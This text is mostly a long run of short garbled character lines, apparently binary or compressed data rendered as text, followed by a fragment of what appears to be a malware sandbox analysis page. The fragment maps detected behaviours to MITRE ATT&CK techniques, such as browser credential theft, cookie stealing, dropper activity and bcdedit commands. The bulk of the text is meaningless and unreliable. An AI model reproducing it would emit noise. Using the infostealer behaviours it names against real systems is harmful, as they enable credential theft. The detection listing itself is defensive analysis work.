F<uf+m
?_*mh
'# ?T
x]LT{H'6
3Wi,#q
!A!(Ub
\`'<\
X8fsE6V
MrBR]yJu
I~R^0-
-Gi5IKb
WyQH9
cS5G.8h
zzFV6
@I53"eu
nn+m`
v&Sq-
bga%u
S@]rS
KE4[2xY
Y'}*Y*
`cf|r@
XIIe7
~O5N'
`uIRYY}
<X`oL
>lpmh
SMWqA
&D.!N
#?ZIh
@lvhvMnrp
fV8*gj
yBo~:
aLgqt`
\I,}l
_\Hb)
ttc|Z7
@/@]b>
%bN?b
Sq$b~1
kg-*&
&r5DbC
wASV=>
N7h=~A
/1-RX
SM^#K
f cqu
%:Km;<X
YrG2G3
MWQut
X[~1UV
H;M"A
eVR;I
~PfjA
gI\a
HeJ pJ;]
8vid2!
GilR)
U6iB%
/K@oy
ht6z*%
7FylT
&zqpe
@a4=2
s~yZp
qO"0s
YY_>7
vbfDh
-[MiF
W6"#m
O^8[G
]lxVu
2*r,P
m5Yqk
+s~?D
2wJ&\F
AQR8q
au_Mm
5^;6E
u; jt
IKWrOb
]("R$(
Zc^1#|
%se?I
2xwugo
jR#OX
J9EU<.,
)eTY+
_)u[r
9`>%H!
wA `y
FV<YDI
HL2EB
Q%;/'2l
0_g;lQ~X`
-q0Er>
8L|S>]
\VlmU
b3rw#
Im4]k
CWBgxm
H,z*@i
~W6?a_2z
,]<Pj*
Io@Hv
pD)y@
bw$/!2
Q<I>FS
i]2Q8
hj@5 K
N?e@o2
N9Nz
_0yVH
B[h S
AUJx8
U;dQ$Z%
~5o.g
of/uw
,)qF>
~L3h|
GOch1,
\tYIO
5?s>`4
zH@UH
UlFLw
{ltkA
.Z%[O8e
}bv!e
0AgJPb
tes'X*
wsVH^
|iL($
A@K'}/
ow'j-F
M;Bc~
MB!XQ
{RF],d@k
p_N6$
JZqZmi
Gvkax
4i(*-
d,u5S
Qqa?}
+<dpV
2Ab\X
po:5{
X=u_&86o<
3;AaP
<q!xC
iz 3g
!&!7I
)J17EfE
O3-/e
3-(\
-6?Ad
Pa>xs$
"y uMv#/
.a8w9A
F<F3gH
b'q7D
nE*{L
+_/Y5
$~|)>;
3jrTF
2ATB}
7H)CK_|t
yk>UD
N~>Fq
v77uA
>>)|#R
48v*$
4z"B@
_0y/y
@Voc21
88[6f
eaHh3
&a[':}
f50L:
0\8*wN
JyXgo
nO5FU
c&:5U
tC{o3
{<;jN&<p{
~L1Uj*(Lz
aO\i0
Li`M^y
g<a%>L
R{y5I
JP(|K
Q|26I&
Z'E7y
lN^UYy
OQQud
V1O9v-
BSzri
>@FS.
O4:>38
p(~!/
]usx.
Py#.
#3f|k
xmosplu
-jn8L!
&01XD,
)nfUt
~]iK3[
(=%U#
?rH<s]
P)s0S
X"D"c
:4,i[7V
&f)v3
m8A+"
Dd\&(
sD_1=
T29KC
o4Ii#;!
5:xm>
>7N[f
)*wuR
52E"G
<2oD(2+[
-P B&
hxBwV,
6#v$P
j^ju-
Y-->2q
xtvM49
{kkN?
nZs1C
r*tN-
MWZh^
MNs2Qc
J,B\E
?Fo'a G
F`fd6W
.?Y#f
_i=@B
antnG
$P..9
1C^7A
vL!a9*
,#IIN\
q%>N&
q^w4pu
XjAb7
{L+vp
o[T4q
]&osP
r61yt
5MpvFD
dOI~y
R-xiw
RO!!]fI`
KP/QE
iV~R.
aT7t4p
r^bI9<^
J~nvj
% 4EH
*[_*l
,|#*j
Z5q&f<
/@C7i
|*t03Q
UQ2W8
AJ2bXs
#SjJ
X*7xzrl
kr>22lZA-
]>Lbq
I%P<[
uxszA
Treg
%<l<_
+iObR+
Ff_~s
,[C{_!:-
~W$0G~m,
k6}Ic
_z1E&
(ngcw
.U&3Ll
jO_%)
*vwr:#
=O+WL
d)1T>
|57V$
@v!o1
\8j3A
z!0T=;
9GkUN
W\9%B
w> .cX$+Z
lxV@)g
!XS@F
[:T?G
"Iohr_
=<C2'
-7?v<
NG&}_
^:L|BM
ph}53
'wE]3
MBLAX
re`8:
fa>We
2qw5"7
O/=__<
x?Ip]
"J#Ah
#jyC!
M_^`n
4KMfL
*"R{9
{dZ|L
JIfkl
&0J7X
z/Bh=
eUH\ZZ
nA,g1
?=8pq
N;92?2
s9kZqn
`3G2?
L`=m\
-7J=
F{'aO
o=1rw
J`#"E2
OPtT$
`@ $/
kbw(Z
8;k'ew?
=DXFrs
D@nS|
:Gc*p
5~tB#;
pf.?^
IfD>|-=
hOLa9
JvSJU
4NT*M
>U2&^
Vj+l-
x^Tw[
`Pn=0
z%KGq
n1Unie>
Q6fi/v
$1j,{
~sF.eqW
ag~R3
9F<`5]
!Don]
s1"#V
g3!\l.\
C2(SV
/s"W:w1A
ZG>ZP
6~(eY
O#t^D
I>\\[(
VbI./
"p=n_
Qb@Ew1Z`
.`fz)
551!=rKy
o.}n`
Ne\i9
{ F_@
[MrL|3
H ab (g~|
+6s$3
fb6O3
j`aK|A
/2|'nnm
^-)lJ
CS]hqu
Nf%>}Z
i:3cZ9-
U<{3]
D|\PS*
]`EGvTRU
jYKcl
jA1l0
u)F9c,
ZWogI
C7K{]
5V(]0
cV0nE
;ePtA
;@-}8
^B/Q9
H]"WB5H
aJ)=r
a\{Tc
GDhdV
(Wo)u
MpT%8
FJx(u
!w2360
T+>G6
*#yuv
J-!sP
uGoUZ
cBG")T
.lo5d
Wff*'
~m{"f
s!o=_*
W5rkw
3W%""
{P5GN
-Yp`^
rua-n
`L gh
m>_zX
f4H.
\g(y3
=yTdS@iU
n.Z!eAGc
D]Hei:s
27s^H$
?RAU[
Ucm.d
)}N`$
rk7mF
3G(Us
OS3mb>R
Qnh&WE
t>k10
4bpRL-s
C_;uk}~
,Jy*q}
Wa`9X
y^@\Lv`mG|
G!-+TqS
[vE*&
<Ve&$
qDJ!|
zy8!mP
p+{h,2
72mm:X
TC6=E
7RQCIk
>|>& :
)!e]Q
JV-fv"
2t@C;
j%9&_
J2_Ci[
G\z.\
rNAI:
l62)Oh
~FYJ0
"C{p,k
Sa0NP
![Q+!
FY"/[
>".Z?
'`m0"
>ZBB
X&VrDG
pBPzc-
ie6vA
$Q/w2G
s4086
Pa``^<
z ?Ub
%)0uY
;:E'&
C@4aa
XJl=U
mz -f$5
Hr"( <
aF2J&7
Lub9L
uF7J3m
MCo+I
C{^1J
-K3 p
Zhdk3'(;{
G)Baj
"S_LW
e)t=i
6OdNT
QW<=N+
OpxA+
S4E%)
P}Qj7
*p!DJA
:/0c t
m+7^P
SFB%}
PH#D~
!pCNB
p:8D?
,KXWi
fi+:oV
;WU9Q
Re\G5
j5A}]
hb;q;=
N;:^w
:6N<_K
uh3WK
/f'cx
E}XhG
Vg/Ld
DHCuE)
}&EkY
2__MAC[
`q|v@
W8JV-{
PHwv0I
j:RZx
m.T9O
3Cn-n
E"2@k
@|p?lM
7s#7'
Y!\-J
3Pa4Cb
d_{rR
O=Fs,
uDs5.
#}~rz7)
jY4;C9z
*ThNL
(r+\3
I-]Ow
?Y!*'
<AYOp
~usoIE
[%2/h
PHQ/M,v%~
tH,8,
Q<t=iA
CG[DMpj
X*C:[Z
mx/\B
"L/\{
n|";n
<iDr_
_JK~}W
Ft.a7
@eHqO
by$r&stl
0s.{;`&
8\/Js
M5&R%
/U'wD
}z$8d
C?/Z2
E&%_$
cBh9)
a>`Mw
8hJ>r
Hu6Q~
=X[|x
gZox6
JuATP
V1%_+R:
Ia3rC8
_x{.5
w)XPP
Vm?B!!
=2aP"
'Y9s@`
Dy&:f /
`3-{hf?'
?1v@vI
)[Fyw
K[}#z
I`=~cP?A
mJ.d\t
re ,;
qy30G
YU9G`
`hSP*~$j
eVD>9@
Eef!)
Nh;!>
5XI6+
_(g<~p
U`Oq_
#]!Rw
'?rri
u^P#K
l8.=Fu
w0?T4
\rkoN
bL2B!
AjTM|!`
Pt}6y
]=R8{m
.lDP`
q0K.=!
\J[j_
p1fXY[BcW
fZ#<Y`|
kG$><e
^NO"L
C[&4(
m8j[B5~
{N!6W
Jjl8m
1W.8~
@wTyX
KdR9sY
B$yucv
l3j[H
bX<3\
(cTzs
;GB<1*
pOUj(2
qH,0,
[Ol(|
I%h9Z2
%/=i`
SSVa"
m4`no
\!&CV2
pjpLI
iTGk>
"^o[77
BBEa0
+nCtJ
4]6~N
lR|qcz
lrN{F
'Csr!
hlu+(bS
9.L4J
L~v\(G
rZ_Oz
PYHaW
2xp~zp
gX,vi5J
lBob/*
>#P5f
r'1$+N
'|>^o
6/h0YN
Doi0=c/
vEKj\
j/[zLE:
|)Vzs
I4]Ff5
X:#%PI
rIq?4
h8lkr
8x]L#
\'W-]e
Xl:&.
+7qB&a
arSU*H:
^*-@kQ
A;z%^}
|v*/B
uz,A.
\l,Ugaa
OYE=-
$R/Z8
m'LrF
nSOEr
@,U$-
XX8K*@
WPmmN
qC~8*3
$Q>jVMx
FZhnv
+5u?p`O0
}[H2>
b=\j*
Z5pfbT
+y<Y<L
}O`PN
K4Xl-
_H'2K
UcL'}k#Z
gmX$~
s|he
9;J+83
'iBHXv4
{3QI=
SxD"I
!>`1-
pAP#g>
Q\PPb
Q<h=p
uab-[r
7;uQk
jwV\\~
D)(9R#
PB Ezi[]8c
=das
."#s+
et:b.
~DZ)T&
C;ClM
~dNDj
K-..X
bs:-x
_Di[v
Nq73,
fYF*
{"X^]
A+b5vm
Q-N]s1>)&5
~B&nx
RF.r^
a=VT<
Gf>6ll
}X5^\*rq
lE7[[
/HD^\
z5:b 0
"\-G=
xE"<q
gk9'@s
rC4@'
>E}G>
MU1&~K
Tb"Kr
y5s0~C
HmKt{20
1Er.,)
{\k'<
$<b*-B
G/2@XAhj
$.U5+
3p+A8
l[oS9
hn=AG
??6qJ
qrS42
nU7LS
Dss?)
]maX@
Ct]m7d[,4Y3k
=#]rme
IC4PV
%:tSc-yd
<ma)De
gUcJS
OU6}(`
1GH<>
vxz*w
EP*xj
C}qW#
@>|E9
\3$&n
N#Z[uL
{JR6~
N_>Be
Hh@LD]
yRzhD
g*Z&BG
1!S^q
i_0~Rl{
T;0J%
4N/}K?7
!)c\PP{
$=,Rr
b.#EZ<E
"owD%
SF|?iV=N
Q0'](
;F]L#
d\;N6hE-2,
p)|ot
\}Et~
ME;;h
s}#;Xk
.%&+t
*%xk\
]k/t:
6.?iO
ct9w\
P`&WD
Wos}'r
^#7t-
uf`>|
j@-xB
.UYmBJ
?c3#H;
>'pyS
V9p\E;
-ER<>
vv8IB
oHoHU
;xQHB
$EB+nI
S>&Mk\*
"TcpbH
<bVLJ
=-V0g
'%BtFPm0
jqn@w
\2vtk|
dt wr
H/<g`
}_kOR
b>2?9l
dU_#Qt
~t.paS
QEg~)
md?]b
2n0(#
:K|y{q
5o/0U
5:D%L
r{4I4@
sPbaZkz
W3N2*c_P
SLL8h
'5FSf
$U( y1
qXw;(>h
mtQNs
`ZQz'
(n`a|
a`.w[
m*+pa
Fq*bo
Y0gbhq
fB3lh
1b/sj
fEB0#u
lcq?n
jcqB}
X/(}rC
{unT#
92o\b
RR0X3
w?FJq
NiC.|?
Z`gn1
~s*i3
RfX?e]
#/~pi
\@VAa
/Q@(]
<REF^
]8$Ej
LDrq_
e`=UL
tD\1 ~
L;n]~
0ZY#U
obCMV[
\g5Y`
MZrH>
$N*U$!
G~=Win
2N^e8
aR'1B
_L"Y'([
0nIDY
@\un1doA
y@@PfY
bI;jT'
MJ-/H
ow}SUF%
xpy/|+5
5q&<\lT{^p
J7jC|8+Jd
BI/R#
iGG%6QR
O9LYvTI.
t>LNc-
c4V};
dH~mJU6/d
>)nBXQ
\c@.[
@vU}Z
/KfX?
[}}"k
ShUa\_
QDW5h
<BEjr
ys =ct
f5XeTY
pW\56A
PlGs!
OktU5
?3Pb*
|U7TC
|B]Kh
YEsu7
&!Tw2
p,~`Z6e
@]\Cs
iZE<#
89+)jyxwT1<
;!i[n5
`}$6'C
"*+SV
A8O2-@@
=tewx
[9gv=|
BTVgW
($S\|
?TpJ'
k$f$~4>
+R1Cj
/6]DI}VlZ8
,8YMDC
q8(z|
^>HQ6U
V5f|1
p:2I>
IVASR.
?"\k?#
]V:qm~
1muU'
~*:j`
J,wKXzWXM$~
:c;(/6
4;|(u
MVmJR
i4.a3
F+)2a
nRkxH
8^;"x0O
*}E88
PW'e[
{+p`r;l
+o@,B
R\s1f
>'MI3
iaRnV
w3nj;
V=&tI
\bu=q~
pP7hR
Ph{0{
@*eLO
z&y5sMZ+
+YV-+
2)D$GO
4@Dcb
7!-4t
OS7]U
;Nb ;OF
1Iq`+
x{!6z
B-#*1
]h{8J
a=U"vn
7?] OC
Y0-~3s
<}V}<G`
r b*w
J1jMD
]A}ci
ki/1:
ke,6n
b%BKP3\
kEly~
giZ=!
!P$[=x
d[|`}
`n&Z@
b>uQR0
Q(658
AP"Y*,
/OFPn
PEu}i
b<&&8UW
9,xyrb@n(
@Il:<|r?)
cDg9E97
}@fwL
Vq5\y
wpp*4
kDj{w
uvbgl
6_<bZ
Mr0(<YjM`
del,p
6}yF
-?TL{p'+
h^f&{
hQ[;Z
4?FN~[T
?"z.Q%
pG'EQ
ZFYC)
+:M4m
"--})z
m6VP~i~
W &Mke
. 9xE
kyj1a
6WS(IF
v%ZDI
^<Df)V
-(9oB#n
!9+Ki
KsZ{Dw
t %r1
0tQ'U
72[\L
FVc-G8
-|umq`
_=J58
.R4_Y
=nIo/
R_4oX7
?[oQt
~^ve3k
tNt@2
:Ccs\
YVWT6D
@/6.q`
cg@"J^e
~nJq]VO
NRX=~
EX2T{
Jg 6?
[Y8<Z
<iZ8]X
zwa0$
XTHBX!
'OE|X
q&TVS
bA] Y
NZ%G)V
WN)Y+
rykaf
#werp1
9k+@q
+LXMC-
CD69qQg
sY!D[
2'2 <
AmVb|-a
vPNF`=
H?_zf5
WNH(;y
u-gs2
]a>5;
3.=Y:
]qSj;E
HJ"X+b
'aSi
wHa~F?{
REI75
EOnL %
"pO )
@x)L
?gWtO
hd|+?
SV9'/
u&9*pU
gD^*z
{,f,,
e#YE.
,j|!]
sB<CdP=
{u)G*
tj/ID
b!}`O
p(zbX"
purVh
8^n'{
I$a?f
+<I]u
Q':=n_$
;o!pp
HA}QN
!^R^+C
\->h.l
kI_G<l
EiZ\U
[Quv~$
E*5hD
)wi_j
5bK.T
q=h-~
Vlw$X
.E$q<
R4%EFI*
k^-?X
;Z/-3
k)h81
@cE1Yi
GVXRxl
OEI%-
m&5)<z(
zWpJL
YV;oe7
mDBq]`
Lv(e=C
N7Wg:A-
Lg/,)
,4MlJ
=.tyv2M
t-N@0X
*UYAV
ewU<K
2!hJ,
~ZJy$v
"Lht9B
>?bcs
8|JoH[
tw`1m
G8Zr7
)Fl:a
d$=9aw
4[CE9
eOUpx
jGcDX
uikz"Y
B J|jc%
&utm(
!OgA5
dL~p'
9'LRK
v:.Jf
+xf=f
nN> S,h^
~+gH5
w3k}#rw|
kNaIK
mkf_a
[<b:+
J_!C[
Q)|q,
;:wg5V
l@J F?PIn
4UM{i
<a5o\E
<Y }G%
G4J:A
E^TQ3
zu?jwsVN
k"z&tt
<nU)q
i\j I
gU&C*,
r2sg"
U=qf5
SILPO
)wwIgSda
E*J5y
&&Y.:
u+"k\
Lhyx7
{^JH,
)WiR^
JyY|GQzx
>=i^$
t(?nR
0SqGo
'9|8[\_
fc@&;
x,`y9
FLf]0
7A`>K
Q^Fi@
ZhV_-FP
q3kYQ
miD`_
<Exz?
6MUEt
oK,lj
aM. (
?GAXn&
e\9B^8e
J2xIG_
+ofD=
F9"c~lu
{x=YcnIj
I+ `R
1's5V
M$Yr'm
%"u**
O{NsG+[
_u#v~
l5u J}
N:VOT
[\?G{
U}H;8:R
M!xpk
ip6[f
R?kBC
{UE2t
{q2}s
eK :6
)NuO]Q
;(+L:2
G [d $|
a$dI=
3:QAV
D&l(H
WB{=J%f
"SL $
]adix
N+nbXY
GZ0?+
$:n$Z
>Zc20[*~
2d`r[
`}*^<
FJ?6f
|"H-1
BexNi
xE>-U
,=>|q
+m=;3
d}K{5
AkIHDh
>OIJ+M
aA&;a
i5y2y
UE[m%7q%
m.z^DS}
!KL$:"f'
I>~J-
6'^$O
EyQU[
38+UQ
1b"%%N^
{ct,F
.1x75
l)5.9A
y+w>k
Kd\^,8:
+#;^%
{x:;\
]`r>>
WV\}7
eAl|a
feq.]~
M&zm)
C`|!8
ko&92
>h%*X
2]=,iW
q'^fm
B,#2`
nsSnU
oWRh?M
,gkTu
iCArA
Q"Tgk
!|)Vb
M_w9O
=dAa%
)/JeA
OD1jK
2x!_C
G,DcG
9lC{h
]uS.+
bG26i
~ F\N
V;joCi
ag;k"
@wWn
nqOkA
7<Ay2c
V'VF2
#X>XT
/@F+s
N~3E>T
wM.[k&
&yS0v
7hNf1S
,~e5+
54b]T
%f~h6n7
R|)>5iq
c=/ 4Qxx
f}Y~i
x\'Sg
-6m\L
w{k-!
Y;bXM
CQ9kvW
#11?{
TFWE'
'=/kw
M/4q0fe
Fo2rg
dt%^IE
XjQ'X
W{%1I
[d!Zs
u&7s
?r"+*
F1((4
^Tgd@
*]m7n?
boq}&H
%/O"q
Tx|Aj
Xs7vd%+
(Pxrnj
Y*s!-
rqJ:MM
:&iu+n\O
u4?G$
M43N
4BNs&
#fsKW
qHR>/.
f*160d?
!Z4F0
@&CD+O
"gf!~
DI2zJ
~s3"(
GTVn10
D%Ghf
5H"o@1
@[GoM
ly2Pv
-J3;q
*S<uO
!e0nz
BAL,z
2}ME\@
sil#t
dncCb{
,r~X'
p^aE!
Oaa#X
4VV|mu
&a+i<
wHi0m
E8U$7c3
vjH|7y
;Z.74
>nwkp
8FHcQ
R,Gw5`
]tV27
e.3-b
<k^bH
%k_c3b
?`C>d
dak7@
p`(fx
ZRI0,-
0w!dQ
F18oS
*~V9[
^wIp?=
?)fH%1B
{"F!_
/\hAu
yqx<+
!_mQ/B
9R0a?A0
qK=s|nf
6AKg=Wy
k%KZ.
%zzVL#
RlNMWp
v.qEW
o2X-C_U
q]/n^E
UPIX@
c9 H'
1)]ZA
nv3,&
-~O+Y
).tx:
'mwg?(
~cZXG
5a-8E
DQIUO
I=Qnv
rQ=@t
f>lm-
KRl~,
LX0Dp
NOY%"t
Aq?&un:y:
e7>,
~~Oz_
3]@.$#qJ
&ad~1
a#ykU
Kl:^:
j".OK
w@<i+
8Q[#r
!Dh4C
A_Ycq
K3k3j
QHptS$
bBLwz
(-V.s
XWveR@
[5/o{
HK8gue
"7#v-t
~Q|`4
h<;"n
w/6*7
||sGu
9_T|z
Wbm91
)OA'l=
u)2r=%&
G0%h4
_p^;1
Wh(p3
ybu,x
G$MiI
W`r))d
XR|SE+
I}|=x
p/Q4#
mD/?)pQTm
~!$F}TD
6y\0Q
T7jMMfD
D:5&H
PiUvJ
B9K-.
5D$`m
<lh>t
x{Fx*
,7Y$)n~L
Bb+h_v
ap.\g#B
Y/hB)Wq
)'boO
6?8ar
wuRR]
@UWi.)
[|Jm,?
pmU(p
z'bIp
okn%=>
5\A\Cc
d*&7,
/|MNa
uXT`q
N!Nm6:Q[C
#B%D0
c%<o)
w?RHc
We21x
kb#n.
Y`d(h
]v!ECcy
XN_Al
ZC;6G
N<B;4Y
$pk9=
kZ(UR|>
n6Vv}:
QG# ^.=
][vRn
7@;J
6Bow_%:
NIh u
{Urt9)3
{A.8Z
Y]^R\
wy<Q
,yYkX
XR,46
:C;b<3
'QTCU-)
,`jnB
mInS8
#\LRR(
F"?K3FH
V>+Bl
M^d3v
hi>yt
%bt:v?
Du.A>
j^l?%
j{8Vh
eRnBZ
k-c,2K[8
WV{`s
boO}\y
>37~L
wt.<4
NZB*x#
FCz>G
C+::l
f{Yuh
}"rKL
E0W Y
JSza>a
i[v/V
-yGd@
/4cl-"_?mA
U,QvG08
a/~#7
1%M*[
#LJdO
"~hQW
}3NfU#7
!;yG#
FXM}v
<WM%s)d
`3t*M
Z'5c4
+I@;s
JyJ^i
cWpi X
1;)Ty
<=KloeJy?
3<2Le
']AdG
tO_IN
>+?9b
f<?gi
Oiu]L\
S'M'.
jwpiX
.1~?Ko|q?G0T@Tp
NuOoj]
SDlBe
Z3$0x
vJdH$
IE}2*
U;6R8
MrQlo8
[MEDc
Q^kza9
QPP]_v\O
[J#"^
D<@4}d
1u*%p
G=Mg8
{0 we
J&>!9tN
FZ_g $
{Q3^
=O:55
.V'0cm
0[qHXf
Nqt"S
~a-_Gn
}]"@fU
6Ivgk
:)#>s
.S3-z
vqaEN
{[}"y
QeJHl
CxYR<F
,wzg'o
pO-xX2
#Qm-9l
tALAj
<wj&"
v3[<m
^S3g7
BlUxr
}L!%J
,RXI<
|i\Z>
E0d)>
Pr[R:"
y9FeqF&
!x'Qf)`
uZS 6
%WX08Ya
66:i_<
j+:@D
UR{ug
jd2Dh
*'xDhe_z
:AvP`
15~d2
pUMw0
k7gjw
mnU_Y
Q\vDm>
a{muZ!
H:CyY
sTv\\
W~Gw4
d6}%_
mn$0c
8r}..R
lyQ0eY
J2cKO
$[}!-Y
vptpW"
JfPvp
-K""}
gBb&w4
`O=xVD
t7NSx
4cz6M
Qy-$hLh
?gv!t.
p-82H
X`n-N8
2zNMV
([A\UtsL1
`tQ>^
]>#Y`?\a}-
WnL8.
3l"}/
t!'zXX
JYKlX
G%mH>
i8r3K
%0B78e
hiN<)
G}^C2
;O_;I#
;q\J{
kOT=`_
SH^SMh
3^zSR/
FHO(n
Fo35`
LGWO]m -5
f_-k)m
L/,oV
Q4^N)
'FJE[
J!w%Hl
.z^4~l!
[Y{Kp
EP2Bmb
=DNbC
GX'=}
CHB!5
yVxO?
C5'E'
vnYVN
)uEKW
Gs6p!
?jI6/
U)>CV
^=}vy
Hr4"]z
A1?2G
F@(X1d(
%j3j-
7(@V*
r\5pt
\%FF/
'wAc]
/4W!|
!z3<7sY'HW
<Z~Is
jvMV<KI
k_P`S
=K;0==
F"wNe
T<V8
0*.6E
}5DyE:
g<XVU
5N,+!Q
`'JK^$
X}!/Nh
>7m/qv0
[VijYV
Y6O*R,
7]Jxd
_bWr<
70{M(P
'S5Zy
@XvTNdK
{=[1\!y
H\kz1$
GE/dZ
g$xku
NV5?}{Rr
9[>rs
e?y(Dt
&Ifmw^v<
W[Yu-
Nws-7
t5M3w@
"asuetd
j_nc;
4S l[
HeB18,J
xq\?2
5S<~r0
xqY&-S
ndV6,}
j`<$iO
r`_;c
=O(GE
eA#sH/
c5B\Y
EUnkwn=Wn
Su."|
g7(X;
V/Rv1
E8fIn
8=11;a
e3fgg
")"wh
+E?sjs(
v1HsQQ.hw
Xk?rO
c|v+p
WB"#JP`k
|gYvs<
/_>:0'
fE/fE
N.+1e
x<']NN
wI2F_
=ZoXJ
V{-{WF
tTCPw
2Z$pH
#yLVcm
9z;'usZk
A[ |#
(]is%V
O.>R@
h9;010
9KfJT
##O,$
%IF&:Em
m,~:-
;eC&`
#mRY{R
`4|><
6O5cW
-p#@/P
}JpU&
:L\E!
Cq(pl
{OW:m
fT0.7
4 Y5.
P'RF*m
uX}S
[5RgR;^]`
Qv4Ex
.)T@@Fj
.L Ox
J '#ZR
TndA^
FcKJv
uqF6^(
%\[VM
(o`N"W
h|H?8
)gmg,
2H</!
|8:f"
FLSuoL
`L4(w
M}X:X7*
DKcjW
3Xn.P3
UJuwt
#Da;ab
9ug?X[b
K}q75z;
fr'vM
ADHV:
_>$9<
0p/i,
~oe\R
5H|]A
Ri)y1
ztdMfJ
i90>
[6iN)
u387tVvz4
^Ar q<C
>y]rr
$8t$_J%
D[#cV
TbS>6
fkfUC
-E(|}
sCm#h
.|x*:
mFcwK
Arf6HQ
qj<xE
J!}0t
H[OhR;l;
*,cav
CTVZyT
;!^P|
*I7<t
1k|~.
ahn=g\
_9Xis
[,(d%
QK}L:*
gp:8D=
%4h=9v
bF,qw
YV2=ob
E_VQ=
y4J/`f
mIk(m
wDG79
yUkX[
(t`R5/
.'vn+>
L1%1`
#ef*
$u_)^
7cEae@
~R:Eh
R.Ln4s
9TD;Q
)wT5w
X|"}1
n@a~Y
4d<4Li
:;R)}X:?
_r~Xi
m b!m
]*iO4U
t`VyP}
;~bf9
&5)+R0
WRu, <c
${[w&
13!kI
y^~w;
H2H2,
W.l}1g,
d.yHVy
R40E/D
Wuj#Ma
i$Hqg
k'uEV
H7#V?
v+zrC
7u!ON
KX{tQt
u-K`2
Od}LXi
C=u+{3
dS3r7
t/1.j
P "JW8<=
,A_nA
10$eA
Me< R
m7]<Cu\
dY'r}
!c:0}
)C.NO
s.Ry#
8ZRKh
J<ey`
HV]>[
k)vX3"
BNjXlu
ls`[MEy
WI4n@
va`4#Y
Byb8yp{
c7!+x
^dFra
?8'qg
?U:8{
T~ Pc
xTp3C
yZeP}
,e{7t
V,wQK
z~9Bu6
v-&YP
+!f/_
M$r<i
*u AI
,k#)Go0
jbh#$,
g7+.lKS
tu0JH
Cf]SZ
3~[z7)
9R_yW
oAtIh
6x^!0
}lofzo
27,3x
I4RpL
*Fv%Bk
k}2gd+
RT}Yw
>~9zB
s(Y.'
GW]:y<
]](i'3
1#J!q
LO0Z,*
3>8GQgjF
^D?( 3
i$urv
w_O S]
\ZEYq
Mru9&
wh&Xgr
-vikA3<:
&|\"a
3mL4k
BbR92
0s#,b
rHw20
(JWLKm
*!yUm
6EK&"
wUSTnA
qxLV=
SPGtC
u1i;w
-fHKA
f);/=?
CH?}@
@~(P
TO["0
@w$X4
M,-I`
^/3D+
/gVwS
q64K@
S/^9*$
x.9 X
+?[)/
J!~)o
d991>
+Uo-`"Rx94&
c&L)%[4\B
JY`2V
R?pc>
_K!Jd
qb!Fq
qM7h*rUN=~
UHhIu
LV.PvX
hZMT(
|B<g>
'oVJ%
FY>!G
.hI&n
BTxHF
g;7;[~x
[IN^s
c&&/\
]v+"<
$=o3{yp
pM(K4
hh0Bc
,1iHz
=|8ue
]YvNv
fym,f
}aStM
`k{Te
ZCE=Ttl*`
mKQE;
<CPQY&q
\~%O#
L"PzK
&6V\.
6i1zk
6&MpA_-u
KCshW
WqFXje
%MI?2
)O&Vz
&*5GP
Dw1=
=u=/UT
aD?%U
qo,9'
&nDa\k
)ezeH
p!<rv
$'8ea?
:*D"m
Cbe1Sb
Q"uE'
2BkI8
*CzX9a
%DPngp
uq6b-
DZu;1
u1wT>
vjJi_u
]YXwB
}XF{D
rEO|"T<h
6@;$-
toNhp3_
k2$!M
&H:(!
?]Xq+
vF/|+
vV|ft
NxE!Mp
QP(1?
b^>T[
w.K'}
;*EFg
3}76[Xr|
6tIOW
BOlQ1
2Xee_
%&8jH
u%];yw
y=6uU
h8GV:
xL0]C\M*
9_(EFAT\4j
.6g#P
M2we5
~~QO;
90m5 D
Ut*B9
@:Dhv
2:F'H
-gzdO
$e5H7
yLvxOb
sI@/Q
6"0?a*)2
&jk\^
5D69Q
#Y4Se'
l}F>B
l`@B$
'^GM+
^;W*`
k|O+O
Adr9/l
UIhqMJ
PI{*E
YhjqW
`g}8x
#0[c`]
<6B8I
>CruE
(m Qp
6me~y
J]b#`
]*pI4
mk1sf
R`KS!
Ia9Ah
SMno&c
>kv2w~f
$x#$G
SuE*)
WSR6@
,@Qa\
lXaT1
N[t7(
R74eN
BTnb2
<73~P
6=p!(
N5tk/rOh
{zdBc
hfi!7
id1Ni
Yr~no
CcOmeA@
BClC/
#=|;D
][!5Q\
FB\h"7
K'rjU
e~lc#
3.&-D
]2v{X
4[.=*W
iX1!L
!j,dG
aRR>Bu
9y3>V
kJnKP 2
Mg=w&o$G
bI<r%
P#n"v>
8JFmCqN
3|N<h
JCc8LFY
}fW4O
UDmS.s
oYWny8
&192_]
m&`5=l
|`}(b
"R&G*
nwo8]z
\qL_V
#e/O%
6:.ZF&
*@wQ;
:uNMb
UFND1km
41CA!
/]m;q
QS\9s?
* 8^"
$qv3B
P~!>W
8"(\%
]YfZ
~!~<L
55~2o
:-dW:
9 =Mw;c
0m'q1
-D-ZLY
Z_X>D
],4bG
.%e~L
EJ3HH
-+;J
O$,f9?:
uinMz
le\>Q^
3LDq5
xt&PH
KL+0s
f@o~l
Nu9fY
A2rU*
!(` H
4#LNs
S.3'(5
p2&@[X
/l@~#[
4Gon8
.A[nk
r<b3n
JN; m
3)8N-
6)0S+
4$-I@'))
}tqo:
a)QB6W
v9fvA
+6s!_
w(ViNr
:eAdH
"L-5uN
zb2\b
uBOyk
G9?.!59
St9/k
p'[@=
Dcc2}
n>92^|0
G+6p]n
_=O.R
2(cLr{
RuWR)b
~he7t)
t5yN^
b>ye0
Y9/TV
tX((V
C~t*'
N3V^m8^}+
b1R|zZ
\3O8_
,[\^b
hWACj
u!rJ`
U6Y!65
c7Te*)8
jfqu!
Na<x-
UD89w
nWr8~}
ps?l]
#r>c5
$~hKl
6CwRV
5~;l:L/
&9+Xa
&h>[+
0eJ*4
C:_S
--U\p
Oh(`A
*h$y+
aa*hr
Q(~-R
$M(pS
!#/YU
WlD]o
F'Fv?
jIc=G
[@nGc>
E=znV
d%wc+
Iq;DA&
hJ90u
Yj^Zt.
xSH]nYy
?&RVK
;,6!h<A
N9;0#f
)4sc`%{
k!@6M
NG7+X
Rb6:n
kMv2xF
Reports: JSON HTML Lite

Credential Access Execution Persistence Privilege Escalation Defense Evasion Discovery Command and Control Collection Impact
  • T1003 - OS Credential Dumping
    • infostealer_browser
  • T1539 - Steal Web Session Cookie
    • infostealer_cookies
  • T1555 - Credentials from Password Stores
    • infostealer_browser
  • T1552 - Unsecured Credentials
    • infostealer_browser
  • T1555.003 - Credentials from Web Browsers
    • infostealer_browser
  • T1552.001 - Credentials In Files
    • infostealer_browser
  • T1129 - Shared Modules
    • dropper
  • T1106 - Native API
    • process_creation_suspicious_location
  • T1059 - Command and Scripting Interpreter
    • script_tool_executed
    • cmdline_terminate
    • bcdedit_command
